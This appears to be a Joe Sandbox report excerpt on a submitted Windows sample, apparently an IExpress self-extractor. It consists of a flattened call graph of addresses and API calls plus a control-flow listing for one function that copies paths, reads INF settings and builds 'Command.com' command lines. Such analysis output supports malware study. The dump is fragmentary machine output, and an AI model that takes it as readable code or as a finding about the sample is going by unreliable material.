3094 1002ac7 3093->3094 3095 1002aaf LoadStringA 3093->3095 3094->2999 3094->3000 3095->3094 3097 1005d45 GetVersionExA 3096->3097 3104 1003914 3096->3104 3098 1005d65 3097->3098 3097->3104 3099 1005d83 GetSystemMetrics 3098->3099 3098->3104 3100 1005d8f RegOpenKeyExA 3099->3100 3099->3104 3101 1005dae RegQueryValueExA RegCloseKey 3100->3101 3100->3104 3102 1005ddb 3101->3102 3101->3104 3111 1005c1c 3102->3111 3104->3012 3105 1005cd4 3104->3105 3106 1005ce0 3105->3106 3109 1005d0b 3105->3109 3115 1005c9f EnumResourceLanguagesA 3106->3115 3108 1005cf7 3108->3109 3116 1005c9f EnumResourceLanguagesA 3108->3116 3109->3012 3112 1005c23 3111->3112 3113 1005c4f CharNextA 3112->3113 3114 1005c5d 3112->3114 3113->3112 3114->3104 3115->3108 3116->3109 3118 10027d0 3117->3118 3128 10026b1 3117->3128 3120 10027f1 3118->3120 3121 10027e8 GlobalFree 3118->3121 3120->3039 3121->3120 3122 10026e8 GetFileVersionInfoSizeA 3123 10026ff GlobalAlloc 3122->3123 3122->3128 3123->3118 3124 1002713 GlobalLock 3123->3124 3124->3118 3125 1002724 GetFileVersionInfoA 3124->3125 3126 1002737 VerQueryValueA 3125->3126 3127 10027a9 GlobalUnlock 3125->3127 3126->3127 3126->3128 3127->3128 3128->3118 3128->3122 3128->3127 3129 10027f8 GlobalUnlock 3128->3129 3130 1002081 3128->3130 3129->3118 3131 10020a3 CharUpperA CharNextA CharNextA 3130->3131 3132 100218c GetSystemDirectoryA 3130->3132 3131->3132 3133 10020c7 3131->3133 3135 100219e 3132->3135 3136 10020d0 lstrcpyA 3133->3136 3137 100217e GetWindowsDirectoryA 3133->3137 3138 10021ad 3135->3138 3140 1005b32 3 API calls 3135->3140 3139 1005b32 3 API calls 3136->3139 3137->3135 3138->3128 3141 10020f9 RegOpenKeyExA 3139->3141 3140->3138 3141->3135 3142 100211e RegQueryValueExA 3141->3142 3143 1002173 RegCloseKey 3142->3143 3144 100213d 3142->3144 3143->3135 3145 1002143 ExpandEnvironmentStringsA 3144->3145 3146 1002166 3144->3146 3145->3146 3147 1002158 lstrcpyA 3145->3147 3146->3143 3147->3146 3149 1001683 3148->3149 3150 1001627 GetProcAddress 3148->3150 3149->3054 3149->3056 3151 1001679 FreeLibrary 3150->3151 3152 100163a AllocateAndInitializeSid 3150->3152 3151->3149 3153 1001678 3152->3153 3154 1001668 FreeSid 3152->3154 3153->3151 3154->3153 3157 1002a34 6 API calls 3156->3157 3158 1003dad LocalAlloc 3157->3158 3159 1003dc1 3158->3159 3160 1003ddd 3158->3160 3161 10038cc 24 API calls 3159->3161 3162 1002a34 6 API calls 3160->3162 3163 1003dd1 3161->3163 3164 1003de5 3162->3164 3165 1003547 3 API calls 3163->3165 3166 1003de9 3164->3166 3167 1003e0c lstrcmpA 3164->3167 3168 1003dd6 3165->3168 3169 10038cc 24 API calls 3166->3169 3170 1003e28 3167->3170 3171 1003e1c LocalFree 3167->3171 3173 1003e23 3168->3173 3174 1003df9 LocalFree 3169->3174 3172 10038cc 24 API calls 3170->3172 3171->3173 3175 1003e39 LocalFree 3172->3175 3173->2910 3173->2913 3173->2934 3174->3173 3175->3168 3177 1002a34 6 API calls 3176->3177 3178 1003d25 3177->3178 3179 1003d2c 3178->3179 3180 1003d62 3178->3180 3182 10038cc 24 API calls 3179->3182 3181 1002a34 6 API calls 3180->3181 3183 1003d73 3181->3183 3184 1003d3c 3182->3184 3339 1003566 wsprintfA FindResourceA 3183->3339 3185 1003d91 3184->3185 3185->2915 3188 1003d81 3190 10038cc 24 API calls 3188->3190 3189 1003d95 3189->2915 3190->3185 3192 1002a34 6 API calls 3191->3192 3193 1005651 LocalAlloc 3192->3193 3194 1005667 3193->3194 3195 1005688 3193->3195 3196 10038cc 24 API calls 3194->3196 3197 1002a34 6 API calls 3195->3197 3198 1005677 3196->3198 3199 1005690 3197->3199 3202 1003547 3 API calls 3198->3202 3200 1005694 3199->3200 3201 10056b7 lstrcmpA 3199->3201 3203 10038cc 24 API calls 3200->3203 3204 10056d0 LocalFree 3201->3204 3205 10056ca 3201->3205 3206 100567c 3202->3206 3207 10056a4 LocalFree 3203->3207 3208 10056e0 3204->3208 3209 100571b 3204->3209 3205->3204 3228 1005681 3206->3228 3207->3228 3215 1004b1a 63 API calls 3208->3215 3210 10058db 3209->3210 3211 1005735 GetTempPathA 3209->3211 3212 1004161 28 API calls 3210->3212 3213 1005769 3211->3213 3214 100574a 3211->3214 3212->3228 3218 100577a lstrcpyA 3213->3218 3221 100578d GetDriveTypeA 3213->3221 3222 10058ad GetWindowsDirectoryA 3213->3222 3213->3228 3346 1004b1a 3214->3346 3217 1005702 3215->3217 3220 1005706 3217->3220 3217->3228 3218->3213 3223 10038cc 24 API calls 3220->3223 3224 10057a0 GetFileAttributesA 3221->3224 3237 100579b 3221->3237 3381 1003f0d 3222->3381 3223->3206 3224->3237 3228->2921 3228->2934 3239 1004112 GetWindowsDirectoryA 3228->3239 3229 1004b1a 63 API calls 3229->3213 3230 1001f6e 25 API calls 3230->3237 3232 1005833 GetWindowsDirectoryA 3232->3237 3233 1003f0d 40 API calls 3233->3237 3234 1005b32 3 API calls 3234->3237 3236 1005874 SetFileAttributesA lstrcpyA 3238 1004b1a 63 API calls 3236->3238 3237->3213 3237->3224 3237->3228 3237->3230 3237->3232 3237->3233 3237->3234 3237->3236 3374 1005e13 3237->3374 3378 1001f4b GetFileAttributesA 3237->3378 3238->3237 3240 1004131 3239->3240 3241 100414f 3239->3241 3242 10038cc 24 API calls 3240->3242 3243 1003f0d 40 API calls 3241->3243 3244 1004141 3242->3244 3245 100415f 3243->3245 3246 1003547 3 API calls 3244->3246 3245->2929 3247 1004146 3246->3247 3247->2929 3249 100520f 3248->3249 3249->3249 3250 1005256 3249->3250 3251 100522f 3249->3251 3452 10049db 3250->3452 3253 1004161 28 API calls 3251->3253 3254 1005254 3253->3254 3255 1003566 9 API calls 3254->3255 3256 100525f 3254->3256 3255->3256 3256->2924 3258 1001f03 3257->3258 3259 1001f2c 3257->3259 3261 1001f20 3258->3261 3262 1001f08 3258->3262 3601 1001ddf GetWindowsDirectoryA 3259->3601 3596 1001ea3 RegOpenKeyExA 3261->3596 3264 1001f1e 3262->3264 3591 1001e52 RegOpenKeyExA 3262->3591 3264->2935 3267 10052ad 3266->3267 3276 10052e8 3266->3276 3268 1002a34 6 API calls 3267->3268 3269 10052be 3268->3269 3271 10052c7 3269->3271 3269->3276 3270 1005400 lstrcpyA 3270->3276 3272 10038cc 24 API calls 3271->3272 3300 10052d7 3272->3300 3274 1002a34 6 API calls 3274->3276 3275 10053df 3277 10038cc 24 API calls 3275->3277 3276->3270 3276->3274 3276->3275 3278 10053f9 3276->3278 3279 1005440 lstrcmpiA 3276->3279 3282 10055bd 3276->3282 3284 1005591 LocalFree 3276->3284 3285 100562c LocalFree 3276->3285 3288 10055a3 3276->3288 3294 10053a3 lstrcmpiA 3276->3294 3301 10054c0 3276->3301 3607 10022ff lstrcpyA 3276->3607 3659 100198b RegCreateKeyExA 3276->3659 3680 1004560 3276->3680 3277->3300 3278->2933 3279->3276 3279->3288 3283 10038cc 24 API calls 3282->3283 3287 10055cd LocalFree 3283->3287 3284->3276 3284->3288 3285->3278 3287->3278 3288->3278 3700 1001b8b 3288->3700 3290 10055e1 3293 10038cc 24 API calls 3290->3293 3291 10054d4 GetProcAddress 3292 10055f7 3291->3292 3291->3301 3295 10038cc 24 API calls 3292->3295 3296 10055f5 3293->3296 3294->3276 3298 100560b FreeLibrary 3295->3298 3297 1005612 LocalFree 3296->3297 3299 1003547 3 API calls 3297->3299 3298->3297 3299->3300 3300->3278 3301->3290 3301->3291 3302 1005575 FreeLibrary 3301->3302 3303 1005626 FreeLibrary 3301->3303 3693 100370f lstrcpyA 3301->3693 3302->3284 3303->3285 3305 1002a34 6 API calls 3304->3305 3306 1004493 LocalAlloc 3305->3306 3307 10044c6 3306->3307 3308 10044aa 3306->3308 3310 1002a34 6 API calls 3307->3310 3309 10038cc 24 API calls 3308->3309 3311 10044ba 3309->3311 3312 10044ce 3310->3312 3313 1003547 3 API calls 3311->3313 3314 10044d2 3312->3314 3315 10044fa lstrcmpA 3312->3315 3321 10044bf 3313->3321 3316 10038cc 24 API calls 3314->3316 3317 1004547 LocalFree 3315->3317 3318 100450f 3315->3318 3319 10044e2 LocalFree 3316->3319 3317->3321 3320 1004161 28 API calls 3318->3320 3319->3321 3322 1004527 LocalFree 3320->3322 3321->2910 3321->2934 3322->3321 3324 1003554 GetLastError 3323->3324 3325 1003558 GetLastError 3323->3325 3324->2932 3325->2932 3327 1002a34 6 API calls 3326->3327 3328 100466a LocalAlloc 3327->3328 3329 1004690 3328->3329 3330 100467e 3328->3330 3332 1002a34 6 API calls 3329->3332 3331 10038cc 24 API calls 3330->3331 3334 100468e 3331->3334 3333 1004698 3332->3333 3335 10046a8 lstrcmpA 3333->3335 3336 100469c 3333->3336 3334->2934 3335->3336 3337 10046c8 LocalFree 3335->3337 3338 10038cc 24 API calls 3336->3338 3337->3334 3338->3337 3344 1003613 3339->3344 3345 10035a4 3339->3345 3340 10035a9 LoadResource LockResource 3341 10035be lstrlenA 3340->3341 3340->3344 3341->3345 3342 1003624 FreeResource 3342->3344 3343 10035e7 FreeResource wsprintfA FindResourceA 3343->3344 3343->3345 3344->3188 3344->3189 3345->3340 3345->3342 3345->3343 3347 1004ba7 lstrcpyA 3346->3347 3348 1004b2c 3346->3348 3350 1004ba5 3347->3350 3409 1002f7a 3348->3409 3418 1003e60 lstrlenA LocalAlloc 3350->3418 3353 1004b43 lstrcpyA 3355 1004b9a 3353->3355 3356 1004b5f GetSystemInfo 3353->3356 3363 1005b32 3 API calls 3355->3363 3359 1004b71 3356->3359 3357 1004bc0 CreateDirectoryA 3360 1004bcc 3357->3360 3361 1004bef 3357->3361 3358 1004bd6 3362 1003f0d 40 API calls 3358->3362 3359->3355 3367 1005b32 3 API calls 3359->3367 3360->3358 3365 1003547 3 API calls 3361->3365 3364 1004be0 3362->3364 3363->3350 3366 1004be4 3364->3366 3369 1004c03 RemoveDirectoryA 3364->3369 3368 1004bf4 3365->3368 3366->3228 3370 1001f6e GetWindowsDirectoryA 3366->3370 3367->3355 3368->3366 3369->3366 3371 1001f9d 3370->3371 3372 1001f8d 3370->3372 3371->3213 3371->3229 3373 10038cc 24 API calls 3372->3373 3373->3371 3375 1005e49 3374->3375 3376 1005e2e GetDiskFreeSpaceA 3374->3376 3375->3237 3376->3375 3377 1005e4d MulDiv 3376->3377 3377->3375 3379 1001f5a CreateDirectoryA 3378->3379 3380 1001f68 3378->3380 3379->3380 3380->3237 3382 1003f21 3381->3382 3383 1003f29 GetCurrentDirectoryA SetCurrentDirectoryA 3381->3383 3382->3213 3384 1003f4c 3383->3384 3385 1003f6d 3383->3385 3386 10038cc 24 API calls 3384->3386 3431 1005e67 GetDiskFreeSpaceA 3385->3431 3388 1003f5c 3386->3388 3390 1003547 3 API calls 3388->3390 3395 1003f61 3390->3395 3391 1003fd2 GetVolumeInformationA 3393 1003fea 3391->3393 3394 100404f SetCurrentDirectoryA lstrcpynA 3391->3394 3392 1003f7d 3396 1003547 3 API calls 3392->3396 3397 1003547 3 API calls 3393->3397 3398 100406e 3394->3398 3395->3382 3399 1003f98 GetLastError FormatMessageA 3396->3399 3401 1004003 GetLastError FormatMessageA 3397->3401 3403 1004082 3398->3403 3407 1004097 3398->3407 3400 100403b 3399->3400 3402 10038cc 24 API calls 3400->3402 3401->3400 3404 1004041 SetCurrentDirectoryA 3402->3404 3405 10038cc 24 API calls 3403->3405 3404->3382 3406 1004092 3405->3406 3406->3407 3407->3382 3434 1001fce 3407->3434 3410 1002f8f wsprintfA lstrcpyA 3409->3410 3411 1005b32 3 API calls 3410->3411 3412 1002fbd RemoveDirectoryA GetFileAttributesA 3411->3412 3413 1003015 CreateDirectoryA 3412->3413 3414 1002fd6 3412->3414 3415 1002fde GetTempFileNameA 3413->3415 3416 1003006 3413->3416 3414->3410 3414->3415 3415->3416 3417 1002ff7 DeleteFileA CreateDirectoryA 3415->3417 3416->3353 3416->3366 3417->3416 3419 1003ea0 lstrcpyA 3418->3419 3420 1003e82 3418->3420 3422 1005b32 3 API calls 3419->3422 3421 10038cc 24 API calls 3420->3421 3423 1003e92 3421->3423 3424 1003eb4 CreateFileA LocalFree 3422->3424 3425 1003547 3 API calls 3423->3425 3426 1003ed8 CloseHandle GetFileAttributesA 3424->3426 3427 1003eeb 3424->3427 3429 1003e97 3425->3429 3426->3427 3428 1003547 3 API calls 3427->3428 3430 1003eef 3427->3430 3428->3430 3429->3430 3430->3357 3430->3358 3432 1005e9a MulDiv 3431->3432 3433 1003f77 3431->3433 3432->3433 3433->3391 3433->3392 3435 1001fea 3434->3435 3436 100200e 3434->3436 3449 1001fb1 wsprintfA 3435->3449 3438 1002043 3436->3438 3439 1002014 3436->3439 3442 100200c 3438->3442 3451 1001fb1 wsprintfA 3438->3451 3450 1001fb1 wsprintfA 3439->3450 3440 1002000 3443 10038cc 24 API calls 3440->3443 3442->3382 3443->3442 3444 100202b 3446 10038cc 24 API calls 3444->3446 3446->3442 3447 100205f 3448 10038cc 24 API calls 3447->3448 3448->3442 3449->3440 3450->3444 3451->3447 3473 1002e6f 3452->3473 3454 10049e0 3455 10049e4 3454->3455 3456 10049f3 GetDlgItem ShowWindow GetDlgItem ShowWindow 3454->3456 3457 1004a1d 3454->3457 3455->3254 3456->3457 3476 1003c60 3457->3476 3459 1004a2c 3461 10038cc 24 API calls 3459->3461 3460 1004a28 3460->3459 3482 1006e88 3460->3482 3462 1004abb 3461->3462 3464 1004abd 3462->3464 3466 1004ad3 3464->3466 3467 1004ac6 FreeResource 3464->3467 3465 1004a8c 3465->3459 3465->3464 3468 1004aef 3466->3468 3469 1004adf 3466->3469 3467->3466 3470 1004b14 3468->3470 3472 1004b01 SendMessageA 3468->3472 3471 10038cc 24 API calls 3469->3471 3470->3254 3471->3468 3472->3470 3474 1002a34 6 API calls 3473->3474 3475 1002e7f FindResourceA LoadResource LockResource 3474->3475 3475->3454 3477 1003c9f 3476->3477 3481 1003cf6 3477->3481 3487 1003b9b 3477->3487 3479 1003cbd 3479->3481 3495 1002cb2 3479->3495 3481->3460 3483 1006ec3 3482->3483 3484 1006f9b 3483->3484 3511 1005bca GetFileAttributesA 3483->3511 3513 1006d39 3483->3513 3484->3465 3488 1003ba9 3487->3488 3489 1003bda lstrcmpA 3488->3489 3490 1003bbe 3488->3490 3491 1003c2e 3489->3491 3494 1003bd3 3489->3494 3492 10038cc 24 API calls 3490->3492 3498 1003b00 3491->3498 3492->3494 3494->3479 3496 1002ce5 CloseHandle 3495->3496 3497 1002cc9 3495->3497 3496->3497 3497->3481 3499 1003b08 3498->3499 3500 1003b10 CreateFileA 3498->3500 3499->3494 3500->3499 3502 1003b7b 3500->3502 3502->3499 3503 1003b80 3502->3503 3506 1002b34 3503->3506 3507 1002b97 CreateFileA 3506->3507 3508 1002b3f 3506->3508 3507->3499 3508->3507 3509 1002b89 CharNextA 3508->3509 3510 1002b7a CreateDirectoryA 3508->3510 3509->3508 3510->3509 3512 1005bd9 3511->3512 3512->3483 3514 1006df4 3513->3514 3516 1006d4d 3513->3516 3518 1002cb2 CloseHandle 3514->3518 3528 1004888 3514->3528 3515 1006dcb 3515->3483 3516->3514 3516->3515 3520 1002c23 3516->3520 3518->3515 3556 100288f 3520->3556 3523 1002c3a 3523->3516 3524 1002c3f WriteFile 3525 1002c68 3524->3525 3526 1002c63 3524->3526 3525->3526 3527 1002c89 SendDlgItemMessageA 3525->3527 3526->3516 3527->3526 3529 10048b5 3528->3529 3530 100489b 3528->3530 3531 10049d0 3529->3531 3532 10048c1 3529->3532 3533 10048ac 3530->3533 3535 1002cb2 CloseHandle 3530->3535 3590 1002e1b lstrcpyA lstrcpyA lstrcpyA 3531->3590 3532->3533 3536 10048c7 3532->3536 3537 100493e 3532->3537 3533->3515 3535->3533 3536->3533 3563 1002acd lstrlenA lstrlenA 3536->3563 3538 1004959 3537->3538 3539 100494a SetDlgItemTextA 3537->3539 3540 1002acd 8 API calls 3538->3540 3539->3538 3542 1004972 3540->3542 3542->3533 3543 100497a 3542->3543 3574 1004809 3543->3574 3549 1003b9b 29 API calls 3552 10049a4 3549->3552 3550 1002cb2 CloseHandle 3551 1004916 3550->3551 3553 1004923 SetFileAttributesA 3551->3553 3552->3533 3581 1003a7a LocalAlloc 3552->3581 3553->3533 3557 10028a6 MsgWaitForMultipleObjects 3556->3557 3558 10028f3 3557->3558 3559 10028bd PeekMessageA 3557->3559 3558->3523 3558->3524 3559->3557 3560 10028cb 3559->3560 3560->3557 3560->3558 3561 10028d6 DispatchMessageA 3560->3561 3562 10028e0 PeekMessageA 3560->3562 3561->3562 3562->3560 3564 1002af1 lstrcpyA lstrlenA 3563->3564 3565 1002aed 3563->3565 3566 1002b21 lstrcatA 3564->3566 3567 1002b08 lstrlenA 3564->3567 3565->3533 3569 1002d87 3565->3569 3566->3565 3567->3566 3568 1002b12 lstrlenA lstrlenA 3567->3568 3568->3566 3570 1002da0 3569->3570 3571 1002da4 DosDateTimeToFileTime 3569->3571 3570->3533 3570->3550 3571->3570 3572 1002db8 LocalFileTimeToFileTime 3571->3572 3572->3570 3573 1002dca SetFileTime 3572->3573 3573->3570 3575 1005bca GetFileAttributesA 3574->3575 3577 100481b 3575->3577 3576 1004870 SetFileAttributesA 3580 100481f 3576->3580 3577->3576 3578 1004161 28 API calls 3577->3578 3577->3580 3579 1004859 3578->3579 3579->3576 3579->3580 3580->3533 3580->3549 3582 1003a91 3581->3582 3583 1003aa8 lstrlenA LocalAlloc 3581->3583 3584 10038cc 24 API calls 3582->3584 3585 1003ade lstrcpyA 3583->3585 3586 1003abe 3583->3586 3588 1003aa6 3584->3588 3585->3588 3587 10038cc 24 API calls 3586->3587 3589 1003ad3 LocalFree 3587->3589 3588->3533 3589->3588 3590->3533 3592 1001e78 RegQueryValueExA 3591->3592 3593 1001e9b 3591->3593 3594 1001e92 RegCloseKey 3592->3594 3595 1001e8f 3592->3595 3593->3264 3594->3593 3595->3594 3597 1001ef0 3596->3597 3598 1001ec9 RegQueryInfoKeyA 3596->3598 3597->3264 3599 1001ee4 3598->3599 3600 1001ee7 RegCloseKey 3598->3600 3599->3600 3600->3597 3602 1001e01 3601->3602 3603 1001e4c 3601->3603 3604 1005b32 3 API calls 3602->3604 3603->3264 3605 1001e13 WritePrivateProfileStringA _lopen 3604->3605 3605->3603 3606 1001e39 _llseek _lclose 3605->3606 3606->3603 3608 1002326 3607->3608 3709 1001840 3608->3709 3613 1002360 lstrcpyA 3615 1005b32 3 API calls 3613->3615 3614 1002377 lstrcpyA 3616 1002375 3614->3616 3615->3616 3617 1005be8 2 API calls 3616->3617 3618 1002383 3617->3618 3619 1002511 3618->3619 3620 1002391 lstrcmpiA 3618->3620 3621 1005be8 2 API calls 3619->3621 3620->3619 3622 10023a1 3620->3622 3623 1002519 3621->3623 3624 1005bca GetFileAttributesA 3622->3624 3625 1002575 LocalAlloc 3623->3625 3626 100251f lstrcmpiA 3623->3626 3627 10023ad 3624->3627 3629 10023b1 3625->3629 3630 100259d GetFileAttributesA 3625->3630 3626->3625 3628 100252b lstrlenA lstrlenA LocalAlloc 3626->3628 3627->3629 3632 1001840 2 API calls 3627->3632 3628->3629 3631 100255e wsprintfA 3628->3631 3638 10038cc 24 API calls 3629->3638 3633 10025e6 3630->3633 3634 10025af 3630->3634 3637 1002601 3631->3637 3639 10023db lstrlenA 3632->3639 3636 10025e9 lstrcpyA 3633->3636 3634->3633 3635 10025b3 lstrcpyA 3634->3635 3640 10025f2 3635->3640 3641 10025ca 3635->3641 3636->3640 3637->3276 3642 1002599 3638->3642 3643 1002411 3639->3643 3644 10023ee 3639->3644 3718 10021fb 3640->3718 3641->3640 3645 10025cf lstrcatA 3641->3645 3642->3637 3646 1002414 LocalAlloc 3643->3646 3648 1001840 2 API calls 3644->3648 3645->3636 3646->3629 3649 100243a GetPrivateProfileIntA GetPrivateProfileStringA 3646->3649 3650 1002404 3648->3650 3653 1002490 lstrcpyA lstrcpyA 3649->3653 3654 10024b5 3649->3654 3650->3646 3652 100240c lstrlenA 3650->3652 3652->3646 3653->3637 3656 10024e6 wsprintfA 3654->3656 3657 10024c6 GetShortPathNameA 3654->3657 3656->3637 3657->3656 3660 10019f2 3659->3660 3661 1001b86 3659->3661 3662 1001a00 wsprintfA RegQueryValueExA 3660->3662 3663 1001a2f 3660->3663 3661->3276 3662->3660 3662->3663 3664 1001a34 RegCloseKey 3663->3664 3665 1001a49 GetSystemDirectoryA 3663->3665 3664->3661 3666 1005b32 3 API calls 3665->3666 3667 1001a6d LoadLibraryA 3666->3667 3668 1001a85 GetProcAddress FreeLibrary 3667->3668 3669 1001b0b GetModuleFileNameA 3667->3669 3668->3669 3672 1001aa9 GetSystemDirectoryA 3668->3672 3670 1001b23 RegCloseKey 3669->3670 3671 1001acc lstrlenA lstrlenA LocalAlloc 3669->3671 3670->3661 3674 1001af9 3671->3674 3675 1001b2e wsprintfA lstrlenA RegSetValueExA RegCloseKey LocalFree 3671->3675 3672->3671 3673 1001abb 3672->3673 3676 1005b32 3 API calls 3673->3676 3677 10038cc 24 API calls 3674->3677 3675->3661 3676->3671 3679 1001b09 3677->3679 3679->3670 3681 100457b CreateProcessA 3680->3681 3690 100464c 3680->3690 3682 1004609 3681->3682 3683 100459f WaitForSingleObject GetExitCodeProcess 3681->3683 3684 1003547 3 API calls 3682->3684 3685 10045c2 3683->3685 3691 10045dd 3683->3691 3686 100460e GetLastError FormatMessageA 3684->3686 3685->3691 3689 10038cc 24 API calls 3686->3689 3689->3690 3690->3276 3744 10028fa 3691->3744 3692 1004602 3692->3690 3694 1005b32 3 API calls 3693->3694 3695 1003739 GetFileAttributesA 3694->3695 3696 1003762 LoadLibraryA 3695->3696 3697 100374b 3695->3697 3699 100376b 3696->3699 3697->3696 3698 100374f LoadLibraryExA 3697->3698 3698->3699 3699->3301 3701 1001ba3 RegOpenKeyExA 3700->3701 3702 1001c7c 3700->3702 3701->3702 3703 1001bc5 RegQueryValueExA 3701->3703 3702->3278 3704 1001bf1 GetSystemDirectoryA 3703->3704 3705 1001c72 RegCloseKey 3703->3705 3706 1001c1d 3704->3706 3707 1001c2e wsprintfA lstrlenA RegSetValueExA 3704->3707 3705->3702 3708 1005b32 3 API calls 3706->3708 3707->3705 3708->3707 3710 100184f 3709->3710 3712 1001866 3710->3712 3714 100186e 3710->3714 3732 1005b00 3710->3732 3713 1005b00 2 API calls 3712->3713 3712->3714 3713->3712 3715 1001da9 3714->3715 3716 1001db2 lstrlenA 3715->3716 3717 1001dbe 3715->3717 3716->3717 3717->3613 3717->3614 3719 100221c 3718->3719 3728 10022ef 3718->3728 3720 1002225 GetModuleFileNameA 3719->3720 3719->3728 3726 1002247 3720->3726 3720->3728 3721 1002255 IsDBCSLeadByte 3721->3726 3722 10022db CharNextA 3724 10022e0 CharNextA 3722->3724 3723 100226f CharNextA CharUpperA 3725 10022b1 CharUpperA 3723->3725 3723->3726 3724->3721 3724->3728 3725->3726 3727 10022bf lstrcpyA lstrlenA 3725->3727 3726->3721 3726->3722 3726->3723 3726->3724 3737 1005b71 lstrlenA CharPrevA 3726->3737 3727->3724 3728->3637 3731 10022a7 3731->3727 3733 1005b07 3732->3733 3734 1005b28 3733->3734 3735 1005ad3 IsDBCSLeadByte 3733->3735 3736 1005b1a CharNextA 3733->3736 3734->3710 3735->3733 3736->3733 3738 1005b97 CharPrevA 3737->3738 3739 1005ba0 3738->3739 3740 1005b91 3738->3740 3741 1005bb2 CharNextA 3739->3741 3742 1005ba9 CharPrevA 3739->3742 3743 100228c lstrlenA CharPrevA 3739->3743 3740->3738 3740->3739 3741->3743 3742->3741 3742->3743 3743->3727 3743->3731 3745 1002909 3744->3745 3747 1002903 CloseHandle CloseHandle 3744->3747 3748 1002613 3745->3748 3747->3690 3747->3692 3749 1002620 3748->3749 3751 1002634 3748->3751 3752 1001f34 3749->3752 3751->3747 3753 1001ef8 14 API calls 3752->3753 3754 1001f3d 3753->3754 3754->3751 3756 1001953 RegOpenKeyExA 3755->3756 3757 1001989 3755->3757 3756->3757 3758 1001972 RegDeleteValueA RegCloseKey 3756->3758 3757->2942 3758->3757 3760 10018e1 LookupPrivilegeValueA AdjustTokenPrivileges 3759->3760 3761 10018d5 3759->3761 3760->3761 3762 1001920 ExitWindowsEx 3760->3762 3764 10038cc 24 API calls 3761->3764 3762->3761 3763 100193c 3762->3763 3763->2960 3764->3763

                                                                                                Executed Functions

                                                                                                Function 010022FF Relevance: 59.8, APIs: 23, Strings: 11, Instructions: 255stringmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 10022ff-1002324 lstrcpyA 1 1002333-1002339 0->1 2 1002326-1002331 0->2 3 100233e-100235e call 1001840 call 1001da9 1->3 2->3 8 1002360-1002375 lstrcpyA call 1005b32 3->8 9 1002377-1002379 lstrcpyA 3->9 11 100237b-100238b call 1005be8 8->11 9->11 15 1002511-100251d call 1005be8 11->15 16 1002391-100239b lstrcmpiA 11->16 21 1002575-1002587 LocalAlloc 15->21 22 100251f-1002529 lstrcmpiA 15->22 16->15 18 10023a1-10023af call 1005bca 16->18 27 10023b1-10023c2 18->27 28 10023c7-10023ec call 1001840 lstrlenA 18->28 25 1002589-1002593 21->25 26 100259d-10025ad GetFileAttributesA 21->26 22->21 24 100252b-1002558 lstrlenA * 2 LocalAlloc 22->24 29 100242a-1002435 24->29 30 100255e-1002570 wsprintfA 24->30 31 1002594-100259b call 10038cc 25->31 33 10025e6 26->33 34 10025af-10025b1 26->34 27->31 44 1002411 28->44 45 10023ee-10023f1 28->45 29->31 37 1002601-100260b 30->37 42 100260c-1002610 31->42 36 10025e9-10025f0 lstrcpyA 33->36 34->33 35 10025b3-10025c8 lstrcpyA 34->35 40 10025f2-10025fc call 10021fb 35->40 41 10025ca-10025cd 35->41 36->40 37->42 40->37 41->40 46 10025cf-10025e4 lstrcatA 41->46 47 1002414-1002428 LocalAlloc 44->47 49 10023f3 45->49 50 10023f6-100240a call 1001840 45->50 46->36 47->29 52 100243a-1002444 47->52 49->50 50->47 56 100240c-100240f lstrlenA 50->56 54 1002446 52->54 55 1002448-100248e GetPrivateProfileIntA GetPrivateProfileStringA 52->55 54->55 57 1002490-100249a 55->57 58 10024b5-10024c4 55->58 56->47 59 100249c 57->59 60 100249e-10024b0 lstrcpyA * 2 57->60 61 10024e6 58->61 62 10024c6-10024e4 GetShortPathNameA 58->62 59->60 60->37 63 10024eb-10024ee 61->63 62->63 64 10024f0 63->64 65 10024f2-100250c wsprintfA 63->65 64->65 65->37
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,00000000,00000001,7591F530,00000000), ref: 0100231B
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,01001324), ref: 01002366
                                                                                                • lstrcpyA.KERNEL32(?,?,?,?,01001324), ref: 01002379
                                                                                                • lstrcmpiA.KERNEL32(00000000,.INF), ref: 01002397
                                                                                                • lstrlenA.KERNEL32(DefaultInstall,?,01001318,?), ref: 010023E8
                                                                                                • lstrlenA.KERNEL32(?,?,01001314), ref: 0100240D
                                                                                                • LocalAlloc.KERNEL32(00000040,00000200), ref: 0100241B
                                                                                                • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 01002457
                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01001251,?,00000008,?), ref: 01002486
                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 010024A2
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 010024AE
                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 010024DE
                                                                                                • wsprintfA.USER32 ref: 01002503
                                                                                                • lstrcmpiA.KERNEL32(00000000,.BAT), ref: 01002525
                                                                                                • lstrlenA.KERNEL32(Command.com /c %s), ref: 01002537
                                                                                                • lstrlenA.KERNEL32(?), ref: 01002542
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008), ref: 0100254B
                                                                                                • wsprintfA.USER32 ref: 01002567
                                                                                                • LocalAlloc.KERNEL32(00000040,00000400,?,0000002E,?,0000002E), ref: 0100257C
                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 010025A4
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 010025C1
                                                                                                • lstrcatA.KERNEL32(?,01001324), ref: 010025E1
                                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 010025F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$AllocLocal$PrivateProfilelstrcmpiwsprintf$AttributesFileNamePathShortStringlstrcat
